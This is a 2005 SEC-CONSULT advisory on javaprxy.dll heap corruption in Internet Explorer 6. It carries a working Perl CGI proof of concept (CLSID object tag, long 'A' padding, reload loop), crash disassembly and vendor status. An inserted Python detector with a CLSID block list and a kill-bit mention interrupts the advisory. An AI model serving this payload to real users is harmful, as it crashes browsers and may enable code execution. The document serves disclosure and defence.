ieCrash-javaprxy.txt

Reported 01 Jul 2005 by Martin Eiszner (source: packetstorm, packetstormsecurity.com)

IE6 javaprxy.dll COM instantiation heap corruption vulnerability in Internet Explorer 6.0.2900.218

SEC-CONSULT Security Advisory < 20050629-0 >  
==================================================================================  
title: IE6 javaprxy.dll COM instantiation heap corruption  
vulnerability  
program: Internet Explorer  
vulnerable version: 6.0.2900.2180  
homepage: www.microsoft.com  
found: 2005-06-17  
by: sk0L & Martin Eiszner / SEC-CONSULT /  
www.sec-consult.com  
==================================================================================  
  
  
background:  
---------------  
  
Internet Explorer supports instantiation of non-ActiveX controls, e.g.  
COM objects, via <object> tags. according to M$, COM components respond  
gracefully to attempts to treat them as non-ActiveX controls. on the  
contrary, we found that at least 20 of the objects available on an  
average XP system either lead to an instant crash or to an exception after  
a few reloads.  
  
  
vulnerability overview:  
---------------  
  
Loading HTML documents with certain embedded CLSIDs results in  
null-pointer exceptions or memory corruption. in one case, we could  
leverage this bug to overwrite a function pointer in the data segment.  
it *may* be possible to exploit this issue to execute arbitrary code in  
the context of IE.  
  
  
proof of concept:  
---------------  
  
this simple CGI should crash IE.  
  
  
---------------  
  
#!/usr/bin/perl  
  
# in order for this to work javaprxy.dll must be available on the client.  
  
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll  
  
my $html1 = "<html><body>\n<object  
classid=\"CLSID:".$clsid."\"></object>\n";  
my $html2 = "\n</body><script>location.reload();</script></html>\n";  
  
print "Content-Type: text/html;\r\n\r\n";  
  
print $html1.("A"x30000).$html2;  
  
---------------  
  
on our lab machine, we end up with eax=00410041, and an exception  
occurs at the following location in javaprxy.dll:  
  
---------------  
  
.text:7C508660 mov eax, [ecx]  
.text:7C508662 test eax, eax  
.text:7C508664 jz short locret_7C50866C  
.text:7C508666 mov ecx, [eax]  
.text:7C508668 push eax  
.text:7C508669 call dword ptr [ecx+8]  
  
---------------  
  
as you can see, this situation may be exploitable, considering that we  
have some level of control over eax.  
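The page's PoC has a recognisable shape on the wire: an <object> tag carrying the javaprxy.dll CLSID, tens of kilobytes of filler text, and a script that reloads the page to retrigger the crash. The following detector is an added example (not SEC-CONSULT's code) that a proxy or IDS hook could run over an HTML response body to flag that shape. The only identifier taken from the advisory is the CLSID; the padding threshold, the sample documents and the verdict labels are constructed for the example.

```python
import re
from html.parser import HTMLParser

# CLSID named in the advisory (javaprxy.dll). Any other class that IE should
# never instantiate from a web page can be added to the same set.
JAVAPRXY_CLSID = "03D9F3F2-B0E3-11D2-B081-006008039BF0"
KNOWN_BAD_CLSIDS = frozenset({JAVAPRXY_CLSID})

# Assumption for the example: a page that pushes this much plain text between
# an <object> tag and a reload loop is worth a second look even if the CLSID
# is not yet on the block list.
PADDING_THRESHOLD = 10000

_CLSID_RE = re.compile(r"(?i)^clsid:\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?$")


class ObjectTagScanner(HTMLParser):
    """Collect classid values from <object> tags, note reload scripts and
    count how much non-script text the document carries."""

    def __init__(self):
        super().__init__()
        self.clsids = []
        self.in_script = False
        self.has_reload = False
        self.text_bytes = 0

    def handle_starttag(self, tag, attrs):
        if tag == "object":
            for name, value in attrs:
                if name == "classid" and value:
                    m = _CLSID_RE.match(value.strip())
                    if m:
                        # Normalise case so comparison with the block list is exact.
                        self.clsids.append(m.group(1).upper())
        elif tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            if "location.reload" in data:
                self.has_reload = True
        else:
            self.text_bytes += len(data)


def scan_html(body, bad_clsids=KNOWN_BAD_CLSIDS, padding_threshold=PADDING_THRESHOLD):
    """Return a small report for one HTML document.

    'alert'      - a block-listed CLSID is instantiated via <object>
    'suspicious' - no listed CLSID, but reload loop plus large filler text
    'clean'      - neither pattern present
    """
    p = ObjectTagScanner()
    p.feed(body)
    p.close()
    hits = [c for c in p.clsids if c in bad_clsids]
    large = p.text_bytes >= padding_threshold
    if hits:
        verdict = "alert"
    elif p.has_reload and large:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {
        "blocked_clsids": hits,
        "reload_loop": p.has_reload,
        "large_padding": large,
        "verdict": verdict,
    }


# Constructed sample documents: the first mirrors what the advisory's CGI emits,
# the second is an ordinary page with an unrelated (placeholder) CLSID.
SAMPLE_POC = (
    '<html><body>\n<object classid="CLSID:03d9f3f2-b0e3-11d2-b081-006008039bf0"></object>\n'
    + "A" * 30000
    + "\n</body><script>location.reload();</script></html>\n"
)
SAMPLE_BENIGN = (
    '<html><body><object classid="CLSID:{00000000-0000-0000-0000-000000000000}"></object>'
    "<p>hello</p></body></html>"
)

if __name__ == "__main__":
    for label, doc in (("poc", SAMPLE_POC), ("benign", SAMPLE_BENIGN)):
        print(label, scan_html(doc))
```

The CLSID check is the authoritative signal; the reload and padding heuristics only raise a document to "suspicious" so that variants using a not-yet-listed class still surface for review. On the client side, the usual way to stop IE from instantiating a class such as this one at all is the ActiveX kill bit (a "Compatibility Flags" DWORD of 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}), which is a known Windows mechanism rather than something the advisory itself describes.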
  
  
vulnerable versions:  
---------------  
  
javaprxy.dll 5.00.3810  
internet explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519  
  
these are the versions tested, other versions may of course be vulnerable.  
  
vendor status:  
---------------  
vendor notified: 2005-06-17  
vendor response: 2005-06-17  
patch available: ?  
  
microsoft does not confirm the vulnerability, as their product team  
cannot reproduce the condition. however, they are looking at making changes to  
handle COM objects in a more robust manner in the future.  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
< Bernhard Müller / Martin Eiszner > / www.sec-consult.com /  
SGT ::: walter|bruder, flo, tke, dfa :::  
